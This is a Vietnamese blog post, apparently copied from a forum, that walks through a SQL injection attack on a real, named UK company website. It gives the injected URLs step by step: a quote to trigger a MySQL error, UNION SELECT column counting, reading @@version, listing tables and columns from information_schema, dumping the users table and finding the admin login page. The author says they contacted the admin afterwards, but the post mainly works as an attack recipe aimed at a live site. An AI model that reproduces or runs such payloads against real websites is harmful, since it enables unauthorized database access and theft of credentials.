Trao đổi với tôi

www.hdphim.info

2/6/10

[Hacking] Ví dụ hack nobledistribution.co.uk

Mới kết thúc khóa, rảnh tranh thủ check vài site
Trang tìm thấy lỗi: nobledistribution.co.uk


Click this bar to view the full image.


Chọn link:

Trích:

http://www.nobledistribution.co.uk/p...ype=new&id=145


Click this bar to view the full image.


Trích:

http://www.nobledistribution.co.uk/p...ype=new&id=145'

Xuất hiện lỗi:

Trích:

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1

Dùng union:

Trích:

http://www.nobledistribution.co.uk/p...ype=new&id=145 union select 1

Lỗi:

Trích:

The used SELECT statements have a different number of columns

Tới column 10 là xong!

Trích:

http://www.nobledistribution.co.uk/p...pe=new&id=-145 union select 1,2,3,4,5,6,7,8,9,10


Click this bar to view the full image.


Loại bỏ kết quả truy vấn trước (sửa id thành -145):
http://www.nobledistribution.co.uk/p...pe=new&id=-145 union select 1,2,3,4,5,6,7,8,9,10


Click this bar to view the full image.


Dùng cột 4 để show thông tin, kết hợp xem thử version myssql luôn:

Trích:

http://www.nobledistribution.co.uk/p...pe=new&id=-145 union select 1,2,3,@@version,5,6,7,8,9,10


Click this bar to view the full image.


=> version 5. Vậy có information_schema.
Lấy thông tin table_name:

Trích:

http://www.nobledistribution.co.uk/p...pe=new&id=-145 union select 1,2,3,table_name,5,6,7,8,9,10 from information_schema.tables


Click this bar to view the full image.


Do trang web chỉ show mỗi lần một kết quả nên phải lấy từ từ (not in), thôi chọn link này cho nhanh, vì nó chạy vòng lặp show hết ra 1 lần nên khi union sẽ thấy hết trên web


Click this bar to view the full image.Click this bar to view the full image.Click this bar to view the full image.


Đã xong table_name, lấy tiếp column


Click this bar to view the full image.


Đã có column của table users, show cái này là xong


Click this bar to view the full image.


okey! Tìm link admin là xong


Click this bar to view the full image.Click this bar to view the full image.


Game over!
Đã contact admin.
Kết luận: cái này đơn giản, không có gì lạ. chỉ có cái chọn cái link sau hay hơn link trước vì show hết cho nhanh- . Tốt nhất nên chọn cái link như show danh sách product,... chứ show 1 sản phẩm thì phải làm tử từ

reflink: http://nhatnghe.com/forum/showthread.php?t=27118

No comments:

Post a Comment